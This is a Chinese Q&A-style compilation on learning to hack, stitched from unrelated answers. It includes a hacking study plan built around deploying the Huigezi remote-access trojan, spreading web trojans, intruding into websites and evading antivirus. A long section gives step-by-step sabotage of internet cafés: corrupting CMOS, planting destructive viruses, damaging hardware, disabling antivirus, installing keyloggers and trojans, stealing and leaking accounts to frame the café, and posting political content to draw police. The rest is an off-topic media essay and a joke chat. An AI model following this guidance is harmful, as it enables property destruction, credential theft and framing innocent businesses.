订哪本杂志对黑客技巧的入门及提高最好??
或许你并不想成为一个黑客而是好奇,或许你只是为了高超的技术。无论是什么都需要刻苦的去学习,没有什么事情是不付出努力就能轻易成功的,之所以叫成功是因为那个人拥有着与众不同的本领,如果你想拥有超群的本领就要不断的去学习,而学习也要讲究一定的效率。今天inoker的这个开始也正式我作为一个站长所要为他付出的努力,我知道一个人支撑起一个站很难,不过当我撑到不难的时候我知道我的日子会很好过。
先来说说很多朋友们的烦恼,是不是每次进一个论坛或者在百度搜索一篇菜鸟文章都要很费劲的来读,甚至看到几行便没有信心在读下去,因为什么?因为读不懂。原有的充满好奇的那种信心也随之逝去了。最后因为难以继续学习下去而放弃了黑客。
我曾经有过深深的体会。好比一条狭窄的小路,当你选择工具的时候就必须考虑是自行车汽车还是路行,选择好的方法才能得到一条捷径。下面我把大致的一条菜鸟路告诉给大家,也是我几年来东一条路西一条路走出来的捷径,希望对你们能有所帮助。但要记得,不付出努力即使一米长的小路,你不迈腿一样是一事无成,要想学就得做好下苦心的准备,不是说你今天按照别人做好的动画跟着去做刷到了几个QB就说明你是个黑客了,你内心的喜悦如果可以唤醒对黑客技术的兴趣,那还是值得的。一句话,我希望你走下去。
自己一定要对自己有个计划。不能今天上午学学黑客有兴趣了下午又对游戏有兴趣了。学到的知识相当与没学,学东西一定要有总体上的安排。我哪天哪天要计划学什么。预计多少天掌握熟练。这些在你学之前一定要想。我们提倡一种分类的学习方法,下面我说说分类学习的基本内容。前几天看见网安的这个分类学习路线我想在这里在补充点。
1.黑客术语基础:主要把一些常用黑客术语搞清楚,比如什么叫webshell什么叫注入,什么叫旁注,还有一些常用工具的功能,比如nc,sc等等.还有就是当你遇到一个不明白的黑客术语时就应该首先搞清楚这个术语的意思,到百度或者GOOGLE先查好了他的意思。在进行学习,不可以朦胧的去接触不懂的知识。要先搞清楚。(学习一个星期)
2.灰鸽子配置与使用:通过学习要达到正确配置灰鸽子并能正常上线.对它的功能进行操作训练.(学习二天)这个不用说了,初级黑客听得最多的就是鸽子了。
3.网页木马制作与传播(一个星期)
4.网站入侵(差不多一个月)
5.木马特征码修改(四五天)
当然知识块的划分与学习时间,可根据自己身情况进行适当选择.
下面我把分类学习法过程,技巧,并结合自己在实际学习中以实例形式讲解这种学习方法的具体步骤.
分类学习法的主线:
收集资料----看动画教程与技术文章----实战训练----回过头再看教程与文章---自己制作动画教程与写文章.
按照上面的路线反复练习我想你一定会在很短的时间内有很大的提升。
下面对各个环节进行讲解:
一、收集资料
这个环节,主要目的是收集到尽量多的某类知识块的相关动画教程和技术文章.收集方法主要有两种方法:第一种,利用百度,google,搜索.比如我想找网站入侵相关教程,可以在百度google中输入关键字"网站入侵+空格+教程",这样就可以收集大量教程和文章,可以灵活变化关键字,比如输入脚本入侵+空格+动画,ASP入侵等等,可以搜到大量网站入侵方面的资料,统统把它们收集整理起来。第二种,利用大型黑客网站的站内搜索功能。这种搜索比百度和google命中率要高的多。比如你想找网页木马相关教程,你可以到各大黑客网站,在站内搜索内输入关键字网页木马。
二、看动画教程与技术文章
在看之前,你要准备一个笔记本,专门用来记录在看动画或文章时,不明白的或疑惑的地方,在看的过程中,你可能有些地方看不明白,没关系,把不懂的地方记录下来,当然看动画
与文章时要注意以下几点:
1.要深刻理解动画教程整体思路
2.注意观察动画的每个操作细节,一有不清楚的就要马上记录.那如何解决记录着不懂的地方呢?通过以下几种方法解决。
1.论坛提问:比如菜鸟提问专区,把你遇到的不明白地方描述清楚,发到论坛上,当然你还可以到其它的黑客论坛提问。
2.向黑客群或朋友请教,这里你要多加几个黑客技术群,多交几个要好的黑客技术爱好者,然后,把你的疑难问题拿出来与大家一起讨论,一般也能解决。
3.反复看动画教程,技术文章,有时候,我们看一遍可能不能理解,但反复的看,反复的思考,往往都能解开动画或文章中的疑难问题。
4.用百度,google搜索相关内容,同样利用关键字进行搜索相关内容。这种方法还是不错的,在你搞懂了你的疑难问题的同时也搞懂了N个其它相关问题。
三、实战训练
这一阶段也是最重要的,刚开始你可以按照动画步骤来操作,很多疑难问题在实际操作才能真正体会到,同时在操作中也会得到解决。当然你在操作过程中遇到困难还可以回过头再看动画,并一直反复这个过程。慢慢的就会变成自己的技术。
四、回过头再看动画与文章
在操作过程中,遇到的疑难问题,然后我们带着这些问题回过头来看动画,相信理解的更深刻了。目的也更明确了。在这个过程中特别要注意在你操作的每个细节与动画中的细节作对比,发现存在问题的地方及时纠正。
五、自己制作动画或写文章
经过一段时间的学习,你可能对某个知识块也有较深的理解,也有自己的见解,所谓熟能生巧,熟练了自然而然也有个人的心得体会。这时候,你可以把你的新的入侵思路和技巧做成动画或写成文章呀,这不但提高了你的思维能力同时也锻炼了你的实际操作水平。这也是提高黑客技术水平的一个重要方法。
所以我在这里建议:若你有新的入侵思路或新的入侵技巧,不要埋在心里,做成动画。你会在不知不觉中进步。
以上就是我个人认为效果不错的黑客学习方法,当然还结合了以下四个方面的技巧。
一、做黑客笔记
1.记录实战入侵过程中的疑惑问题
2.在看别人动画或文章时,不明白或不理解的地方也记录下来。
3.同时,在学习过程中,遇到的入侵小技巧,入侵常用命令,优秀黑客工具,经典方法也一一记录下来。以后入侵或遇到难题时,随时都可以拿来查看。
二、收集整理优秀文章,动画教程,黑客工具。
1.分类整理优秀的技术文章。
2.收集整理经典的有技术含量的动画教程
3.收集经典的优秀的黑客工具,大家都应该有自己的黑客工具箱,并分类整理存放好。
收集整理的目的是方便以后的学习。
三、在看别人动画或文章时应该思考的问题。
1.领会动画整体思路。
2.记下不明的或疑惑的细节。
3.评价别人的动画,有何缺点,有何优点,学会分析和思考。同时要敢于提出自己的想法,如何才能进一步完美他的入侵方法。
四、勤做动画
这里做动画的好处,我不多说了,只要你做多了,自然而然就会体会到其中的好处!
只要具备以下条件的,都可以做成动画,我想,也是你掌握技术的最好方法,所以这也是行之有效的提高黑客技术的好方法。
1.看到好的文章就应做成动画:
2.好的工具,经典工具的使用也做成动画:
3.入侵总结:
之前我看到很多人做过木马传播的方法,也看过相关木马传播的文章,不过都比较零散,后来我又参考了相关杂志后就制作了木马传播的综合教程----木马传播终级大套餐。
4.新思路新技巧:
如果你有好的入侵思路或方法,也可做个动画.
5.拓展,延伸别人的动画:
主要是看了别人做的入侵动画,给你带来的新的入侵方法和技巧.
6.改善完美别人的动画:
从以上可以看出,我们要做的教程,尽量不要重复别人的教程,要有自己的创意和想法。所以,大家可以参考以上方法进行做动画,同时在看别人教程时,不要一味的照抄照搬,要有自己的见解,要学会思考,要善于总结,在看别人教程时还要不停的反问自己,能进一步入侵吗?他的这种入侵方法有什么缺点吗?能进一步完善他的入侵方法吗?只要你做到以上几点,我相信,你的技术也会突飞猛进的。
首先,我们了解被破坏网吧的客观环境,要了解网吧人员的实地jian测等。尤其要注意看有没有闭路电视jian控。如果网吧人员对你的个人资料相当熟悉,就住手免的惹麻烦了。部分网吧要出示身份证也不要破坏了,免的惹麻烦。以下破坏方法不分先后,请量力灵活运用若干破坏组合。具体操作细节不详细所了。
1、COMS破坏
尽情乱调吧,电脑系统的好多问题都出在COMS设置错误!!例如:电源设置错误,硬盘数据调错等。这样的隐形错误好多都是不容易发现。最现眼莫过于临走前,加个开机密码,你只用几秒钟,网管人员就要用几分钟拆机去掉COMS密码。
2、CIH类破坏 CIH类的病毒够厉害吧
除了CIH病毒,其他攻击硬件的病毒也有不少哦!把病毒发作条件调到我们离开才发作。
3。硬盘类破坏硬盘破坏软件多到泛滥。黑客站(病毒站)每天都出现更厉害的新病毒。旧病毒“KV300逻辑锁”就蛮厉害的,软硬盘都无法启动!HD-FILL等蠕虫软件也是有大杀伤力,硬盘瞬间充满废文件,硬盘无法使用!相反的做法是低格硬盘类病毒,低格会物理伤害硬盘,多低格硬盘就会报废!
4、超频破坏
超频对电脑有损害,大家都知道!超频带来的不系统稳定,是隐性的,不容易发现!CPU软超频,显卡也超频,硬盘也可以超频等!超频也容易引来黑屏和蓝屏。此法阴险,需要破坏者有相当的电脑知识.
5、系统破坏 破坏必修课
对付网管软件(美萍,网管大师等),多留意黑客网站上的新破解方法。有心就很容易找到的。对付隐藏的系统克隆文件也要找出来(用PQ6等),大肆破坏,至少也要加些病毒进去呀。同时也要把隐藏的分区找出来,进行必要的破坏。最好我们也把搞点隐藏,可以隐藏网吧的分区(文件)等。该出手时,就出手,决对不要手下留情,对敌人仁慈就是对自己残忍!还有就是破坏网吧的杀毒软件和防火墙,这是必要的,象卸掉KV3000,安装假的KV3000等,至少也要让杀毒软件带毒。破防火墙的软件去病毒网站找找,包你有惊喜发现。当然我们也可以下载其他的系统保护软件,让WINDOWS锁定,让其他人不能设置保存。
6、破解密码 电脑上有很多密码是有用的
网管软件(美萍等)的密码都是可以破解的,黑客站有你需要的资料。不知道就去问资深的黑客吧。他们乐意帮谦虚的你。局域网的共享密码也可以破解了(我也是4月才接触到破解资料),把破坏延伸都其他的电脑,抗大战果。有空把网吧的代理主机的上网密码也破解出来。简单点就可以安装个“键盘幽灵”等键盘记录软件,什么帐号密码都会无法遁行。破解OICQ密码的软件,多到泛滥。把得到的帐号密码巧妙地公布天下!最好贼赃架祸是网吧泄露出去的!没有安全感的网吧是难有人去消费的,没有消费者是对网吧的最大破坏。
7、木马破坏在电脑上安装木马可谓历史悠久,破坏经验最多的方法
木马可以遥控网吧的电脑,远程破坏。这样的文章和软件随地是,不浪费时间重复介绍了。最好尽力把木马装到网吧代理上网主机上面。关键是要选对好的木马!用捆绑软件把病毒和木马和主要的软件捆绑起来!(例如IE和OICQ等)。黑客网站和木马网站会令你有新惊喜!
8、其他破坏简单硬件破坏,例如把主机的reset键堵住(等于按住reset不放),键盘”不小心“进水等
来点高风险的,去其他大网站贴不文明的文章,攻击zhengfu的文章,帮网吧引来不少”政治“问题,多贴文章,公安人员就会出手的啦!麻烦大大的有!也可以把电脑做成”跳板“,多些攻击”著名“网站,无论成功是否,IP会给网吧带来麻烦!
9、更多破坏多些留意电脑类书籍中的故障和维修等文章
里面有太多的经验可以吸收!有很多恼人的破坏方法。上黑客网站了解最新的共防知识!还有充分了解中国的刑法.
在你动手破坏之前,要想好先后次序。最好先去实地踩点,了解第一手详细资料,下次一次过动手。不要经常出入同一网吧,容易引起注意。个人安全一定要做足够。最好做个全屏遮盖的快截键(方式),预防网吧人员的走近。假如被发现就一定要XXX,(不是小弟强项,不知道写什么
google hacking 技术有哪些
谷歌黑客(Google hacking)是使用搜索引擎,比如谷歌来定位因特网上的安全隐患和易攻击点。Web上一般有两种容易发现的易受攻击类型:软件漏洞和错误配置。虽然一些有经验的入侵者目标是瞄准了一些特殊的系统,同时尝试发现会让他们进入的漏洞,但是大部分的入侵者是从具体的软件漏洞开始或者是从那些普通用户错误配置开始,在这些配置中,他们已经知道怎样侵入,并且初步的尝试发现或扫描有该种漏洞的系统。谷歌对于第一种攻击者来说用处很少,但是对于第二种攻击者则发挥了重要作用。
当一个攻击者知道他想侵入的漏洞的种类,但是没有明确的目标时,他使用扫描器。扫描器是自动开始一个检查系统的绝大部分地方的过程,以便发现安全缺陷的这样一个程序。最早和电脑相关的扫描器,例如,是战争拨号器这个程序,它会拨一长串的电话号码,并且记录下和调制解调器相匹配的号码。
最权威的黑客杂志或报纸是哪些?
LZ,看一篇文章吧
新媒体与传统媒体博弈或融合,新媒体会是传统媒体的终结者吗?对传统媒体来讲,可谓是“前有追兵、后有虎狼,分指竞争对手和新媒体,如何在二者围追堵截之下找到突围之路,开拓一片新的疆土,传统没有的老总可能都有这样的顾虑,没有动作,只会被竞争对手超越,被新媒体逐渐替代但贸然行动,则又有可能走错方向,浪费人力物力,耽误发展机遇,转型是必然,但必须谋定而动。
以互联网手机等为代表的新媒体不断涌现出新的商业模式与细分市场,不可否认,新媒体在刷新人们的媒介接触习惯和生活方式的同时,也对传统媒体特别是报纸的市场份额带来了巨大的冲击,但目前尚难撼动电视。
新媒体并不就意味着盈利或增长,中国目前乐律全书商业网站军处于亏损状态,新媒体发展速度太快,很多东西来不及沉淀和反思,时时处于传信之中,绝大部分还没有形成成成熟的商业模式,这也为传统媒体的跟进和转化提供了很好的机会,凭借传统媒体积累的众多时,后来居上也是非常现实的。在新型媒体尚未形成有小的营销规模、资源储备以及较为成熟的商业运作模式之前,传统媒体的主导地位仍不会被终结。
下面我分六大项,讲一些梗概了。
第一是媒体的形式,我们可以看一下传统媒体的形式包括有报纸、期刊、广播、电视、出版、电影这些都是可以理解的。对于新媒体来说,主要有以互联网代表的第四媒体以手机为代表的第五媒体,还有楼宇电视就是分众传媒这块。
互联网媒体已经发展到WEB2.0,互联网媒体主要存在的是WEB1.0为代表的网络媒体,互联网WEB2.0的应用普及,比如博客、播客、维客、网络杂志这些都是借助于P2P传播技术,RSS,其中博客是05年互联网发展的焦点,而06年则聚焦于电子杂志。
手机媒体包括手机报纸、手机电台、手机电视、手机电影等新的媒介形态。我要讲的第二个是媒介的特征,新媒体具有这样的一些特征,比如说具有互动性、纪实性、快速性、国际化、丰富、廉价、个性化、还有一个非常重要的功能是便于检索、存储,大家在写文章的时候,会经常利用互联网来检索。但是也有一些比较致命的弱点,比如互联网公信力弱,信息泛滥,还有存在安全问题,比如病毒、黑客、还有隐私问题,著作权问题,还有政策的约束。昨天召开筹备会议的时候,就有一个网站的朋友提到过网站朋友没有采访权,这个就是政策壁垒,现在还没有办法改变。
传统媒体具有这样的特征:比如品牌优势、内容优势、原创优势、客户优势、具有权威性,感性,比如报纸杂志这些拿在手里面可以感觉得,很人性化的,跟虚拟的网络感觉是不一样的。但是也有致命的弱点,就是互动性弱,出现替代性,单一运营模式受到挑战,也有政策的约束,主要体现在对资本进入传统媒体的限制方面。
第三方面是对受众资源的对比分析。目前是处在分众化与碎片化时代,受众的阅读习惯正在悄然改变,传统媒体受众流失严重,发展空间受新媒体挤压,与此同时,传统媒体间的竞争也趋于白热化,传统媒体特别是报纸的受众结构出现了不利的变化,呈现出老龄化趋势,报纸读者中高学历高收入的年轻人群体日渐减少。2004年一项针对北京市场的调查显示,在北京阅读报纸的人群中,35岁以下的年轻读者已经11.6%的人由过去的经常阅读报纸转变为现在得几乎不读报纸,病人数量还在不断增长中,因为他们已经习惯于从互联网上获取新闻及相关信息。这种结果就是年轻人与报纸渐行渐远,身边的同学朋友,看报人数在急剧下降,网站员工看报更是微乎其微。
目前大城市已经有40%的家庭有电脑,90%的单位实现了办公网络化,95%的年轻城市白领已经离不开电脑和网络,现在有的农民工在休息时也光临网吧,读报的一代人正在老去,网络青年开始进入中国,30年后的青年、中年和老年人都是上网的一代。
在获取信息特别是查找信息的时候,人们已经更多地依赖互联网了,不仅如此,随着网络走入生活、进入办公领域,网络已和电话一样普及,人们可以在更多的时间和地点接触到网络,在网络阅读的便利和隐秘性优势得到充分发挥的同时,更加快了人们改变阅读方式的速度。
第四点是内容资源的对比分析。作为媒体来说,内容永远是核心媒体的形式越多,越需要内容支撑,内容资源是传统媒体引以自豪的核心竞争资源,受政策限制,目前新媒体的内容在相当程度上都要依赖传统媒体,传统媒体如果嫩将新技术与内容优势相结合,将会焕发出强大的生命力。
以传统门户网站为代表的网络媒体,因无采访权致使其原创性大大折扣,不得不向传统媒体采购内容或与其合作谋求发展,虽然在体育、娱乐、IT等领域有一定的原创和特色,但新闻时政却是雷区,不能触碰,话语权就无法把握,非常被动。然而,不可小觑的是如今新媒体的原创性也得到了极大释放,比如博客,就是全民皆写手,但如果没有聚焦,也产生不了多大的影响力。
第五,盈利模式对比分析。2005年,就整个整体广告经营而言,四大传统媒体报纸、期刊、广播电视的份额跌破50%,报纸媒体竟出现了前所未有的负增长。据艾瑞市场咨询的调查数据表明,2005年中国网络广告市场规模接近31.3亿,比 2004年增长77.1%,超过杂志广告收入的18亿,接近广播广告收入的34亿,预计2006年将达到40亿,从增长速度上看,网络广告占整体广告市场的比重,也由2001年的0.5%迅速攀升至2005年的2.3%,同时以百度为代表的搜索引擎竞价排名广告取得良好业绩,搜索引擎市场持久升温,另外,博客受到风险投资青睐,博客营销受到广泛关注。
中国四大传统媒体的收入结构中,80%以上来自广告收入,可见传统媒体的主要盈利方式是广告,由此我们可以看到,传统没有的盈利模式比较单一,亟需进行多元化立体经营,拓宽收入来源,可以在内容产品开发商多投入精力,充分利用新技术带来的便利发觉内容产品的深层价值,借助新媒体形态,增加增值服务,转化为市场价值。传统媒体的品牌形象往往成为吸引广告客户的重要力量,比较适合不追求短期销售,注重长期的品牌塑造的行业领先者,但这样的大客户又有多少呢?报纸和电视广告往往打企业品牌,对于中小企业和个体经销商来说,根本不具备在传统媒体上做广告的实力,但网络恰恰使之成为可能,不仅大型企业的品牌形象得以展示,中小企业的产品利用网络能无国界地推销,分类广告市场逐渐转移到了网络平台,因此新客户的开发迫在眉睫,传统媒体应该强化与相应新媒体的互动,分享企业的营销预算。
新媒体的盈利方式则呈出多元化的方式,如网络广告、网络游戏、电子商务、无线增殖收入等,网络对高学历高收入年轻人的聚焦效应,导致了广告商的注意力自然而然地向网络广告转移,目前网络广告占整体广告份额的比例虽然较小,尚不足以对传统媒体整体造成大的冲击,但中国网站的收入来源较为多元化,作为产业群的网络产业,其整体市场远大于网络广告收入,对传统媒体造成的受众分流与媒介消费分流不可忽视。
网络广告的特点是大众化、个体化、价格低廉,如提供搜索引擎的网站百度,按照点击付费,电子商务如农博网的农博通,许多涉农企业和农民经纪人通过农博网网店展示自己的产品,线下进行交易,取得良好的经济效益。
5月31日搜索引擎google而在英国开始提供基础服务,允许用户在其服务器上上传自己的内容,构成互联网内容的一部分,基础库的出现对那些寻求廉价媒介广告者来说无疑是一大福音,但这一举措对印刷媒体的分类广告构成巨大威胁,媒体粗放式经营模式已经远去,更看重精细化耕作和定位,传统媒体的广告效果检测较差。新媒体能将受众进行准确定位,广告商在投入广告时能够有的放矢,受众在访问互联网时,能留下许多痕迹,比如来自国内还是国外,北京还是广州,通过动浏览页面的分析,知道受众重点浏览方向,而随着手机实名制的全面,手机媒体的定位就更加明确了。
第六传统媒体与新媒体的融合。传统媒体要以积极的心态面对新媒体的挑战,注重新技术的应用,形成新的商业模式。传统媒体与新媒体应该进行优势户部,在战略层面进行深入合作,传统平面媒体与互联网的融合,应加快向数字内容提供商转型,发挥新闻和原创内容优势,与网站签署协议,借助网站巨大的流量,来推广卖点,扩大影响,为自己吸引潜在受众群,广播与手机的融合,广播通过短信进行信息采集和与广播听众进行信息订阅,电视媒体与手机、互联网的内容和广告呈现全方位的融合趋势。这里面主要有报纸与新媒体的融合,广播与新媒体的融合,电视与新媒体的融合,以及其他方面的融合。
我们得出的结论是,新技术的发展催生出各种各样形态的新媒体,数字化给传统媒体的发展带来挑战的同时,也带来了历史性的发展机遇。传统媒体和新媒体之间绝非对立,传统媒体媒介经营者的观念、思路和手段需要更新,新媒体的经营者需要传统媒体的经验和资源,竞争的拐点或许就是融合的契机,就看谁能够与时俱进,不断创新和沉淀,不断拓展产业发展空间,开创媒体新时代 10867希望对你有帮助!
到哪里下载有关电脑黑客方面的资料啊?
可以去先看看计算机原理方面的书 然后再看关于黑客的资料 这些资料最好是去图书馆去看看去 下载的话 就是去VERY CD 上边有不少 再有就是新浪知识分享了 还有百度文库 豆瓣上边也有 都可以去看看 关键的一个还有 用好google 那才是最好的老师,。。。
黑客和电脑白痴的小说叫什么..能告诉我吗
一个黑客与电脑白痴的聊天纪录
黑客:我控制了你的电脑
小白:怎么控制的?
黑客:用木马
小白:……在哪里?我为什么看不见?
黑客:打开你的任务管理器
小白:“我的电脑”里没有啊
黑客:算了,当我什么也没做过
黑客:我已经控制了你的电脑
小白:哦
黑客:害怕了吧?!嘿嘿
小白:来的正好,帮我杀杀毒吧,最近我的机子毛病很多耶
黑客:……
小白:你怎么总是在我的电脑里随便进进出出?
黑客:你可以装防火墙
小白:装防火墙,你就不能进入了吗?
黑客:不啊,我只是想增加点趣味性,这样控制你的电脑让我觉得很白吃
小白:听说你会制造“病毒”?
黑客:嗯
小白:你可以控制别人的电脑?!
黑客:一般是的
小白:那你可以黑掉那些网站吗?
黑客:当然,没听到人家叫我“黑客”吗?
小白:……哦,我还以为那是因为你张得很黑……
“硄!“
黑客:我又来了!!
小白:你天天进来不觉得很烦吗?
黑客:是很烦,你的机子是我见过的最烂的一台了
小白:不是吧,这可是名牌
黑客:我是说你的机子里除了弱智游戏就只有病毒了
小白:哦,那你看到我的“连连看”了吗?不记得装在哪,找了好久了耶
黑客:……再见
黑客:嗨!我来了
小白:好几天不见你,被我的防火墙挡住啦?
黑客:哈哈,笑话,上你的机子比我的还容易,不是想我了吧?
小白:我是想请你帮一个忙
黑客:什么事?
小白:你能不能进入电力系统修改一点数据
黑客:……你想干吗!!
小白:求求你,帮我把我家这个月得电费消了吧……
黑客:去死!!
黑客:你死哪去了?!!
小白:……出去玩了几天啊,找我干吗?
黑客:我要找点东西
小白:在我这儿找什么东西?
黑客:病毒,找一条前几年的老病毒,只有你的机子上病毒保存的最全啦!
黑客:我来了!!
小白:……
黑客:怎么不说话?
小白:心情不好
黑客:谁欺负你了?
小白:我的一个抠抠号搞丢了,里面有我的网上初恋
黑客:这个简单,我帮你拿回来
小白:拿不回来了
黑客:不可能,告诉我,多少号?
小白:呜……就是不记得了
小白:你给我出来!!!!
黑客:怎么啦?!
小白:你是不是用我的ID去论坛玩了?!!
黑客:。。。。不好意思,忘了告诉你了,不过,我没干坏事,就瞎编了个贴子,我保证
下次再也不玩了
小白:那不行!!!
黑客:你还要怎么样?
小白:你发的贴子得红脸了耶,我第一次得红脸,好开心哦,你必须再给我编一个
黑客:倒!
黑客:嘿嘿,刚才我做了一件很有趣的事
小白:什么事
黑客:我到论坛上去顶贴了
小白:这很平常啊
黑客:我见贴就顶,尽情的骂楼主是猪,好解气
小白:哇塞,太过瘾了,我可从来不敢,会被封杀的!
黑客:没错,已经被封杀了。
小白:这还有趣?!
黑客:是啊,因为我用的是你的ID
小白:你是高手吗?
黑客:可以说是吧。
小白:高到什么程度?
黑客:嗯,我无聊的时候就自己黑自己
小白:哈,这个我也会!
黑客:#¥%!你也可以?!
小白:是啊,一关机它就黑了。。。。。
黑客:滚开........!
白:小黑,快出来,我的抠抠密码被盗用了,555~~~~
黑客:没问题,我给你找回来......(十分钟后)没有啊,我用你的号码登陆没有问题啊...
...
小白:那我为什么上不去?
黑客:我看看........姐姐,你打开的好像是m!s!n的登陆框......
小白:哦,原来这两个不能通用啊......
黑客:光当........
小白:小黑,快出来!!!
小黑:什么事情啊?我还没睡醒啊!
小白:为什么我的抠抠密码输不进去啊?
小黑:你用什么输的啊?
小白:当然是小键盘拉,笨蛋!
小黑:............你的小键盘没打开怎么输的进去啊?
小白:你帮我打开撒!!!
小黑:............................(吐血中)
小白:小黑,快告诉google是什么?
黑客:是搜索引擎,就是你找东西很快的!
小白:嗯,我试试,
黑客:试了没有
小白:试了,我用baidu一下子就找到goolge了,
黑客:你能涌用石头扔我一下
小白:我们见见面好吗?
黑客:........这、不太好吧,为什么要见
小白:我想看看你是不是和我想的一样
黑客:呵,你想的什么样?
小白:很帅,穿着紧身衣,又很神奇,哪里都能去,到处维持世界和平啦
黑客:........你说的是蜘蛛侠,老大!
黑客:哈喽~~~
小白:你每天都来,是不是对我很好奇?
黑客:不是好奇,是习惯,顺手就进来了
小白:哼,我有个好办法可以改变你的这个习惯
黑客:........哦?!什么办法
小白:我去电信局把带宽改成1K,这样你就挤进不来了,因为太窄,哈哈~~
黑客:天才啊!..........那你还能上网吗?
小白:能啊,慢慢上呗!
小白:我今天学到点电脑知识.很厉害的
黑客:说说看.
小白:可以一次就让电脑上什么东西都看不到.
黑客:晕!怎么可能,从来没听说过.
小白:把显示器关掉就什么都没有了,哈哈,聪明吧~
黑客:``````````去死~
黑客:你电脑桌面上怎么那么多东西?
小白:方便寻找啊.
黑客:可你把DVD电影放桌面上干吗?
小白:偶稀饭看那电影啊,好感人的.
黑客:`````````````
小白:小黑,问你哦,怎么电脑右下角老提示"C盘空间不足释放```````"
黑客:靠!
黑客:喂!
黑客:喂!小白~
黑客:怎么不理我了?
小白:我在哭.
黑客:啊?怎么啦?谁欺负你了?
小白:不是,没谁欺负我
黑客:那怎么哭噢?
小白:看蜡笔小新,小新迷路了~他好可怜~555555~
黑客:-_-|||,那你继续哭!!!!
小白:我想装杀毒软件
黑客:恩,好,你电脑是需要一个杀毒的.
小白:我要装名牌的,最好是SONY的,要不就宝马也行.
黑客:adidas好不好?
小白:行,你帮我装一下吧.
黑客:靠!我有事!
小白:小黑,假如我想删除电脑上没用过的东西,但又删不掉怎么办?
黑客:可以在启动电脑时,按F***,进"带命令的安全模式"-"路径"-再DEL文件名,OK了~
小白:我想把C盘中windows这东东删掉
黑客:那是系统文件夹
小白:可我都一直没用过它啊.
黑客:我不应该和你讨论这问题的!靠~
小白:你真的觉得偶很白痴?
黑客:是根本就是.
小白:偶网友都说偶很聪明的
黑客:他们怎么说的?
小白:不告诉你*_*
黑客:一定是你又把PLMM的照片发给他们看了是吧?
小白:你怎么知道?~~~~
黑客:靠!!
小白:小黑噢?你暑假有米有有趣的事?
黑客:有啊,怎么突然问这个?
小白:那你发给偶,详细点..
黑客:哦,那你等等..
(15分钟过后)
黑客:不对啊,你要我发给你干吗?
小白:偶老师要偶交暑假作业,记暑假有趣的事10篇..
黑客:靠靠靠!!
黑客:我们认识有一段时间了吧?
小白:恩啊
黑客:你觉得我对你好不好?
小白:还不错..
黑客:嘻嘻(害羞)
小白:干吗?要借钱啊?
黑客:````````````
小白:偶米钱,还欠班长5块钱没还呢!
黑客:````````````当我什么都没问..
小白:出来!问你!·
黑客:什么?
小白:你会盗抠抠么?
黑客:废话!
小白:那你帮偶盗一抠抠号..
黑客:说号码..
小白:10000
黑客:!·#¥%……—*
黑客:我又来了..
小白:来得正好,我有事求你..
黑客:什么事?这次不是让我帮你把水费也改了吧!
小白:你会破解密码吗?
黑客:废话,我是黑客唉............
小白:帮我把达芬奇密码解一下吧!
黑客:去死,白痴电影看多了............
小白:你每天进我的电脑觉得有意思吗?
黑客:有意思啊!
小白:有什么意思
黑客:我在研究你这满是病毒的机子为什么不死机..
小白:我知道啊!
黑客:........#¥%!为什么?
小白:这叫以毒攻毒!
小白:我也想控制你的电脑
黑客:那不行,别人进入我电脑我会疯的
小白:这不公平!!
黑客:嗯,好吧,那你控制好了
小白:........可是我不会........
黑客:嘎嘎~~~所以我才同意啊!!!
黑客:我又又又来了
小白:这可能是我们最后一次见面了
黑客:哦?出什么事了?
小白:我要重装系统,杀毒,装防火墙,不让你进来了!
黑客:原来你这么讨厌我..........好吧,以后我不来了,再见
小白:嗯..........哎,等一等!!先教我什么是重装系统!
黑客:....................
小白:电脑方面的问题你能回答吗?
黑客:应该可以
小白:键盘上哪个键最帅?
黑客:..............不知道
小白:当然是"F4"!!
黑客:晕倒!
小白:再问你一个电脑方面的问题你能回答吗?
黑客:只要不是你的白痴问题
小白:我是认真的!!你能操作我电脑吗?
黑客:嗯,是的
小白:那出问题了,你也能解决吧
黑客:你的问题,应该不难
小白:太好了,我的风扇好像不转了,帮我换一个吧
黑客:........我先走了
小白:这回我电脑真坏了
黑客:..............刚检查了,你电脑没问题
小白:那就是你欺负我
黑客:没有啊
小白:你有!传给我的MP3文件都没有图像!
黑客:救命啊~~~~~~~
黑客:我来啦~~~~~~~~~~~~~
黑客:咦?人呐?
黑客:还不在?这不浪费电吗?
黑客:天啊,你在哪呀,快出来呀,不要吓我呀~~~~
黑客:还不在?我都把你电脑里的文件复制到一个盘,又粘贴到另一个盘一百遍,一百遍呀~!
~
黑客:还没来?
小白:哈哈,我一直在了,只是我的键盘刚才坏了,我搞了半天才知道,插口掉了..
小白:问你个问题
黑客:说
小白:除了我的,你还可以控制别人的电脑吗?
黑客:有的可以........
小白:没联网的也行吗?
黑客:..............
小白:你能摇控打开别人的机子吗?
黑客:................
小白:你还能偷到绝密文件吧!!!
黑客:我想你是电影看多了,去洗洗睡吧
黑客:这么晚了,怎么还不下线?
小白:哦,是该下了,我去拔电源
黑客:慢!你不会关机?
小白:会啊,只是点了关机,它就不动了,只能按电源
黑客:你修改注册表:打开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersi
onWinlogon在Winlogon项上单击右键,选择"新建"→"字串值",输入"PowerdownAfterShutd
own",再双击编辑数值为1,以后就可以自动关机了..
小白:............我还是按电源吧
小白:终于看到你啦,告诉你一个好消息..
黑客:咳咳,我也要告诉你一个坏消息..
小白:啊,什么坏消息,快说快说
黑客:我中毒了..
小白:哇哈哈,天啊,小黑,你也会有今天呀..
黑客:我中了流感病毒~!~
小白:――!
小白:小黑,偶想和你视频好不?
小黑:恩,好的
(10分钟过去……)
小黑:你在干嘛?怎么还不发?
小白:发什么?
小黑:视频啊!
小白:怎么发?
小黑:···········
黑客:刚才你说要告诉我一个好消息,是什么呀?
小白:吼吼,今天有一个男生用了我的电脑..
黑客:KB呀,还有人敢用你的电脑?
小白:是呀,打开后吓的脸青,我怪不好意思的,就出去了..一个小时后回来,看到他正得意的
坐在椅子上笑着..
黑客:我知道怎么回事,是不是他把你的电脑整理打扫一下啊?
小白:是呀,你怎么知道的?
黑客:唉,早习惯了你电脑里乱七八糟的七拐八弯,今天来的一路呼呼的一阵轻松,我还以为
进错电脑了..
小白:――!
黑客:不过,也着实花了我一番工夫..
小白:可是你知道我后来对他说了句什么了吗?
黑客:说了什么?
小白:我对他说,把我的电脑变成原来的一模一样..
黑客:◎o◎
小白:然后他瞪着双眼看了半天后,刷的一下窜出去了*_*
小白:以后不许再说我是小白了!
黑客:怎么?喝脑白金了?
小白:哼,其实我很聪明的,今天我就新发明了一个省电的办法耶
黑客:哦,说来听听
小白:我研究发现这个机箱里的风扇没什么用,转这么快,太费电,我准备把它拆了..
